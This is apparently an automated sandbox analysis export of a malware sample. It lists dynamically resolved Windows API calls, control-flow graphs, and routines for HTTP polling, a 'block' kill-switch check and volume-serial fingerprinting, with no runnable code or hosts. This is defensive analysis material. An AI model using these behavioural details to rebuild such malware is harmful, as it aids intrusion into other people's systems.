                          • GetProcAddress.KERNEL32(76210000,018ADB08), ref: 00B09D9A
                          • GetProcAddress.KERNEL32(76210000,018ADC70), ref: 00B09DB2
                          • GetProcAddress.KERNEL32(76210000,0189A770), ref: 00B09DCB
                          • GetProcAddress.KERNEL32(76210000,01894F48), ref: 00B09DE3
                          • GetProcAddress.KERNEL32(76210000,018ADB98), ref: 00B09DFB
                          • GetProcAddress.KERNEL32(76210000,018ADCD0), ref: 00B09E14
                          • GetProcAddress.KERNEL32(76210000,018ADD48), ref: 00B09E2C
                          • GetProcAddress.KERNEL32(76210000,018ADBB0), ref: 00B09E44
                          • GetProcAddress.KERNEL32(76210000,018952C8), ref: 00B09E5D
                          • GetProcAddress.KERNEL32(76210000,018ADD90), ref: 00B09E75
                          • GetProcAddress.KERNEL32(76210000,018ADD78), ref: 00B09E8D
                          • GetProcAddress.KERNEL32(76210000,018ADCE8), ref: 00B09EA6
                          • GetProcAddress.KERNEL32(76210000,018ADD18), ref: 00B09EBE
                          • GetProcAddress.KERNEL32(76210000,018ADAC0), ref: 00B09ED6
                          • GetProcAddress.KERNEL32(76210000,018ADAD8), ref: 00B09EEF
                          • GetProcAddress.KERNEL32(76210000,018ADC28), ref: 00B09F07
                          • GetProcAddress.KERNEL32(76210000,018ADBC8), ref: 00B09F1F
                          • GetProcAddress.KERNEL32(76210000,018ADB20), ref: 00B09F38
                          • GetProcAddress.KERNEL32(76210000,0189FA48), ref: 00B09F50
                          • GetProcAddress.KERNEL32(76210000,018ADD60), ref: 00B09F68
                          • GetProcAddress.KERNEL32(76210000,018ADB38), ref: 00B09F81
                          • GetProcAddress.KERNEL32(76210000,018952E8), ref: 00B09F99
                          • GetProcAddress.KERNEL32(76210000,018ADB68), ref: 00B09FB1
                          • GetProcAddress.KERNEL32(76210000,01895308), ref: 00B09FCA
                          • GetProcAddress.KERNEL32(76210000,018ADBE0), ref: 00B09FE2
                          • GetProcAddress.KERNEL32(76210000,018ADB80), ref: 00B09FFA
                          • GetProcAddress.KERNEL32(76210000,01894F88), ref: 00B0A013
                          • GetProcAddress.KERNEL32(76210000,01895128), ref: 00B0A02B
                          • LoadLibraryA.KERNEL32(018ADB50,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A03D
                          • LoadLibraryA.KERNEL32(018ADDA8,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A04E
                          • LoadLibraryA.KERNEL32(018ADBF8,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A060
                          • LoadLibraryA.KERNEL32(018ADC10,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A072
                          • LoadLibraryA.KERNEL32(018ADAF0,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A083
                          • LoadLibraryA.KERNEL32(018ADC40,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A095
                          • LoadLibraryA.KERNEL32(018ADC58,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A0A7
                          • LoadLibraryA.KERNEL32(018ADE50,?,00B05CA3,00B10AEB,?,?,?,?,?,?,?,?,?,?,00B10AEA,00B10AE3), ref: 00B0A0B8
                          • GetProcAddress.KERNEL32(751E0000,018951E8), ref: 00B0A0DA
                          • GetProcAddress.KERNEL32(751E0000,018ADE68), ref: 00B0A0F2
                          • GetProcAddress.KERNEL32(751E0000,018A8C68), ref: 00B0A10A
                          • GetProcAddress.KERNEL32(751E0000,018ADE80), ref: 00B0A123
                          • GetProcAddress.KERNEL32(751E0000,01895288), ref: 00B0A13B
                          • GetProcAddress.KERNEL32(701C0000,0189A6F8), ref: 00B0A160
                          • GetProcAddress.KERNEL32(701C0000,018956E8), ref: 00B0A179
                          • GetProcAddress.KERNEL32(701C0000,0189A5B8), ref: 00B0A191
                          • GetProcAddress.KERNEL32(701C0000,018ADE98), ref: 00B0A1A9
                          • GetProcAddress.KERNEL32(701C0000,018ADEB0), ref: 00B0A1C2
                          • GetProcAddress.KERNEL32(701C0000,01895668), ref: 00B0A1DA
                          • GetProcAddress.KERNEL32(701C0000,018954A8), ref: 00B0A1F2
                          • GetProcAddress.KERNEL32(701C0000,018ADE38), ref: 00B0A20B
                          • GetProcAddress.KERNEL32(753A0000,01895468), ref: 00B0A22C
                          • GetProcAddress.KERNEL32(753A0000,018954C8), ref: 00B0A244
                          • GetProcAddress.KERNEL32(753A0000,018ADEF8), ref: 00B0A25D
                          • GetProcAddress.KERNEL32(753A0000,018ADF40), ref: 00B0A275
                          • GetProcAddress.KERNEL32(753A0000,01895408), ref: 00B0A28D
                          • GetProcAddress.KERNEL32(76310000,0189A810), ref: 00B0A2B3
                          • GetProcAddress.KERNEL32(76310000,0189A838), ref: 00B0A2CB
                          • GetProcAddress.KERNEL32(76310000,018ADF10), ref: 00B0A2E3
                          • GetProcAddress.KERNEL32(76310000,018955A8), ref: 00B0A2FC
                          • GetProcAddress.KERNEL32(76310000,018955E8), ref: 00B0A314
                          • GetProcAddress.KERNEL32(76310000,0189A8B0), ref: 00B0A32C
                          • GetProcAddress.KERNEL32(76910000,018ADEC8), ref: 00B0A352
                          • GetProcAddress.KERNEL32(76910000,01895348), ref: 00B0A36A
                          • GetProcAddress.KERNEL32(76910000,018A8B88), ref: 00B0A382
                          • GetProcAddress.KERNEL32(76910000,018ADF28), ref: 00B0A39B
                          • GetProcAddress.KERNEL32(76910000,018ADE08), ref: 00B0A3B3
                          • GetProcAddress.KERNEL32(76910000,01895488), ref: 00B0A3CB
                          • GetProcAddress.KERNEL32(76910000,01895548), ref: 00B0A3E4
                          • GetProcAddress.KERNEL32(76910000,018ADF58), ref: 00B0A3FC
                          • GetProcAddress.KERNEL32(76910000,018ADE20), ref: 00B0A414
                          • GetProcAddress.KERNEL32(75B30000,01895448), ref: 00B0A436
                          • GetProcAddress.KERNEL32(75B30000,018ADEE0), ref: 00B0A44E
                          • GetProcAddress.KERNEL32(75B30000,018ADF70), ref: 00B0A466
                          • GetProcAddress.KERNEL32(75B30000,018ADDC0), ref: 00B0A47F
                          • GetProcAddress.KERNEL32(75B30000,018ADDD8), ref: 00B0A497
                          • GetProcAddress.KERNEL32(75670000,01895628), ref: 00B0A4B8
                          • GetProcAddress.KERNEL32(75670000,018954E8), ref: 00B0A4D1
                          • GetProcAddress.KERNEL32(76AC0000,018953E8), ref: 00B0A4F2
                          • GetProcAddress.KERNEL32(76AC0000,018ADDF0), ref: 00B0A50A
                          • GetProcAddress.KERNEL32(6F4E0000,01895608), ref: 00B0A530
                          • GetProcAddress.KERNEL32(6F4E0000,01895428), ref: 00B0A548
                          • GetProcAddress.KERNEL32(6F4E0000,01895388), ref: 00B0A560
                          • GetProcAddress.KERNEL32(6F4E0000,018AD808), ref: 00B0A579
                          • GetProcAddress.KERNEL32(6F4E0000,01895648), ref: 00B0A591
                          • GetProcAddress.KERNEL32(6F4E0000,01895368), ref: 00B0A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,01895508), ref: 00B0A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,018956C8), ref: 00B0A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00B0A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00B0A607
                          • GetProcAddress.KERNEL32(75AE0000,018AD8E0), ref: 00B0A629
                          • GetProcAddress.KERNEL32(75AE0000,018A8B98), ref: 00B0A641
                          • GetProcAddress.KERNEL32(75AE0000,018AD898), ref: 00B0A659
                          • GetProcAddress.KERNEL32(75AE0000,018AD9E8), ref: 00B0A672
                          • GetProcAddress.KERNEL32(76300000,01895528), ref: 00B0A693
                          • GetProcAddress.KERNEL32(6FE30000,018AD838), ref: 00B0A6B4
                          • GetProcAddress.KERNEL32(6FE30000,01895568), ref: 00B0A6CD
                          • GetProcAddress.KERNEL32(6FE30000,018ADA48), ref: 00B0A6E5
                          • GetProcAddress.KERNEL32(6FE30000,018AD958), ref: 00B0A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 3360c76d67ae0827feb1c9cec8575d294bb5c68cc4072c35adf4df20818aa681
                          • Instruction ID: e88f771bba069bbb65ce81736fb39b478fd5a3737ea19c584196a87be00d832c
                          • Opcode Fuzzy Hash: 3360c76d67ae0827feb1c9cec8575d294bb5c68cc4072c35adf4df20818aa681
                          • Instruction Fuzzy Hash: 4262F7B6704300AFC344DFADED88D663BF9F79C701718851AA689C3364D679A842DB72

                          Control-flow Graph (basic-block list with address ranges, API calls per block and edges; the rendered graph and its executed/not-executed colouring are not included in this export)
                          control_flow_graph 1033 af6280-af630b call b0a7a0 call af47b0 call b0a740 InternetOpenA StrCmpCA 1040 af630d 1033->1040 1041 af6314-af6318 1033->1041 1040->1041 1042 af631e-af6342 InternetConnectA 1041->1042 1043 af6509-af6525 call b0a7a0 call b0a800 * 2 1041->1043 1045 af64ff-af6503 InternetCloseHandle 1042->1045 1046 af6348-af634c 1042->1046 1062 af6528-af652d 1043->1062 1045->1043 1048 af634e-af6358 1046->1048 1049 af635a 1046->1049 1051 af6364-af6392 HttpOpenRequestA 1048->1051 1049->1051 1053 af6398-af639c 1051->1053 1054 af64f5-af64f9 InternetCloseHandle 1051->1054 1055 af639e-af63bf InternetSetOptionA 1053->1055 1056 af63c5-af6405 HttpSendRequestA HttpQueryInfoA 1053->1056 1054->1045 1055->1056 1058 af642c-af644b call b08940 1056->1058 1059 af6407-af6427 call b0a740 call b0a800 * 2 1056->1059 1067 af644d-af6454 1058->1067 1068 af64c9-af64e9 call b0a740 call b0a800 * 2 1058->1068 1059->1062 1071 af64c7-af64ef InternetCloseHandle 1067->1071 1072 af6456-af6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 af648b 1072->1076 1077 af6482-af6489 1072->1077 1076->1071 1077->1076 1080 af648d-af64c5 call b0a9b0 call b0a8a0 call b0a800 1077->1080 1080->1072
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                          • HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AF63FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AF646D
                          • InternetCloseHandle.WININET(00000000), ref: 00AF64EF
                          • InternetCloseHandle.WININET(00000000), ref: 00AF64F9
                          • InternetCloseHandle.WININET(00000000), ref: 00AF6503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 0271d7b4cd74067f19f5d435a3eb98221ba763133f6c7c59ecdb632d61c0f362
                          • Instruction ID: b985d29fc0862fbce8d0b2c7b07b240c58f39cccbb2f78cafb7accb817e94c73
                          • Opcode Fuzzy Hash: 0271d7b4cd74067f19f5d435a3eb98221ba763133f6c7c59ecdb632d61c0f362
                          • Instruction Fuzzy Hash: 54711D71A00318ABDB14EFE4DC49FEE77B8AB44701F108599F609AB2D0DBB46A85CF51

                          Control-flow Graph (basic-block list with address ranges, API calls per block and edges; the rendered graph and its executed/not-executed colouring are not included in this export)
                          control_flow_graph 1090 b05510-b05577 call b05ad0 call b0a820 * 3 call b0a740 * 4 1106 b0557c-b05583 1090->1106 1107 b05585-b055b6 call b0a820 call b0a7a0 call af1590 call b051f0 1106->1107 1108 b055d7-b0564c call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1106->1108 1124 b055bb-b055d2 call b0a8a0 call b0a800 1107->1124 1133 b05693-b056a9 call b0aad0 StrCmpCA 1108->1133 1138 b0564e-b0568e call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1108->1138 1124->1133 1140 b057dc-b05844 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1133->1140 1141 b056af-b056b6 1133->1141 1138->1133 1270 b05ac3-b05ac6 1140->1270 1144 b057da-b0585f call b0aad0 StrCmpCA 1141->1144 1145 b056bc-b056c3 1141->1145 1164 b05991-b059f9 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1144->1164 1165 b05865-b0586c 1144->1165 1149 b056c5-b05719 call b0a820 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1145->1149 1150 b0571e-b05793 call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 b05795-b057d5 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1150->1250 1164->1270 1171 b05872-b05879 1165->1171 1172 b0598f-b05a14 call b0aad0 StrCmpCA 1165->1172 1180 b058d3-b05948 call b0a740 * 2 call af1590 call b052c0 call b0a8a0 call b0a800 call b0aad0 StrCmpCA 1171->1180 1181 b0587b-b058ce call b0a820 call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1171->1181 1201 b05a16-b05a21 Sleep 1172->1201 1202 b05a28-b05a91 call b0a8a0 call b0a820 * 2 call af1670 call b0a800 * 4 call b06560 call af1550 1172->1202 1180->1172 1275 b0594a-b0598a call b0a7a0 call af1590 call b051f0 call b0a8a0 call b0a800 1180->1275 1181->1172 1201->1106 1202->1270 1250->1144 1275->1172
                          APIs
                            • Part of subcall function 00B0A820: lstrlen.KERNEL32(00AF4F05,?,?,00AF4F05,00B10DDE), ref: 00B0A82B
                            • Part of subcall function 00B0A820: lstrcpy.KERNEL32(00B10DDE,00000000), ref: 00B0A885
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B056A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05857
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00B051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05228
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05318
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B0532F
                            • Part of subcall function 00B052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B05364
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B05383
                            • Part of subcall function 00B052C0: lstrlen.KERNEL32(00000000), ref: 00B053AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B0578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00B05A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 22d80000f5161789ef571a38b8f94c1db42e08fc1f9d9f85a3f086dc5b749db8
                          • Instruction ID: 5e968d9e6f1439addae1599e09773a4fcb17f7166841ab412e4c3da4d15be1d7
                          • Opcode Fuzzy Hash: 22d80000f5161789ef571a38b8f94c1db42e08fc1f9d9f85a3f086dc5b749db8
                          • Instruction Fuzzy Hash: 02E145719103049ACB14FBA4DD56EFE7BBCAF54300F40C998B506A65D1EF34AE49CBA2

                          Control-flow Graph (basic-block list with address ranges, API calls per block and edges; the rendered graph and its executed/not-executed colouring are not included in this export)
                          control_flow_graph 1301 b017a0-b017cd call b0aad0 StrCmpCA 1304 b017d7-b017f1 call b0aad0 1301->1304 1305 b017cf-b017d1 ExitProcess 1301->1305 1309 b017f4-b017f8 1304->1309 1310 b019c2-b019cd call b0a800 1309->1310 1311 b017fe-b01811 1309->1311 1313 b01817-b0181a 1311->1313 1314 b0199e-b019bd 1311->1314 1316 b01970-b01981 StrCmpCA 1313->1316 1317 b018f1-b01902 StrCmpCA 1313->1317 1318 b01951-b01962 StrCmpCA 1313->1318 1319 b01932-b01943 StrCmpCA 1313->1319 1320 b01913-b01924 StrCmpCA 1313->1320 1321 b01835-b01844 call b0a820 1313->1321 1322 b0185d-b0186e StrCmpCA 1313->1322 1323 b0187f-b01890 StrCmpCA 1313->1323 1324 b01821-b01830 call b0a820 1313->1324 1325 b01849-b01858 call b0a820 1313->1325 1326 b018ad-b018be StrCmpCA 1313->1326 1327 b018cf-b018e0 StrCmpCA 1313->1327 1328 b0198f-b01999 call b0a820 1313->1328 1314->1309 1338 b01983-b01986 1316->1338 1339 b0198d 1316->1339 1329 b01904-b01907 1317->1329 1330 b0190e 1317->1330 1335 b01964-b01967 1318->1335 1336 b0196e 1318->1336 1333 b01945-b01948 1319->1333 1334 b0194f 1319->1334 1331 b01930 1320->1331 1332 b01926-b01929 1320->1332 1321->1314 1344 b01870-b01873 1322->1344 1345 b0187a 1322->1345 1346 b01892-b0189c 1323->1346 1347 b0189e-b018a1 1323->1347 1324->1314 1325->1314 1348 b018c0-b018c3 1326->1348 1349 b018ca 1326->1349 1350 b018e2-b018e5 1327->1350 1351 b018ec 1327->1351 1328->1314 1329->1330 1330->1314 1331->1314 1332->1331 1333->1334 1334->1314 1335->1336 1336->1314 1338->1339 1339->1314 1344->1345 1345->1314 1355 b018a8 1346->1355 1347->1355 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00B017C5
                          • ExitProcess.KERNEL32 ref: 00B017D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 5f27c29710c76597739a09df0185a87e9834c305510adb3b9feb7eeba0075040
                          • Instruction ID: 5ff3481474b7ee3ba768f88fa2043f7446d436a0e3374ecb747f8dc0ba702e29
                          • Opcode Fuzzy Hash: 5f27c29710c76597739a09df0185a87e9834c305510adb3b9feb7eeba0075040
                          • Instruction Fuzzy Hash: FF511074A14209EBCB08DFA8D994ABE7BF5BF44704F108898E805A7290D771D952CB62

                          Control-flow Graph

                          control_flow_graph 1356 b07500-b0754a GetWindowsDirectoryA 1357 b07553-b075c7 GetVolumeInformationA call b08d00 * 3 1356->1357 1358 b0754c 1356->1358 1365 b075d8-b075df 1357->1365 1358->1357 1366 b075e1-b075fa call b08d00 1365->1366 1367 b075fc-b07617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 b07628-b07658 wsprintfA call b0a740 1367->1369 1370 b07619-b07626 call b0a740 1367->1370 1377 b0767e-b0768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B07542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B0760A
                          • wsprintfA.USER32 ref: 00B07640
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 33a363fe12427317ac104071315f0dfcda35cd36ca159820c3bbd76578927970
                          • Instruction ID: fda12e449ac538118b80dd483ce154c8c4d7b564bfa03a5ee28909f0b0016175
                          • Opcode Fuzzy Hash: 33a363fe12427317ac104071315f0dfcda35cd36ca159820c3bbd76578927970
                          • Instruction Fuzzy Hash: AB4171B1D44748ABDB10DB98DC85BEEBBB8EB18700F104199F509A72C0DB75AA44CBA5

                          Control-flow Graph

                          APIs
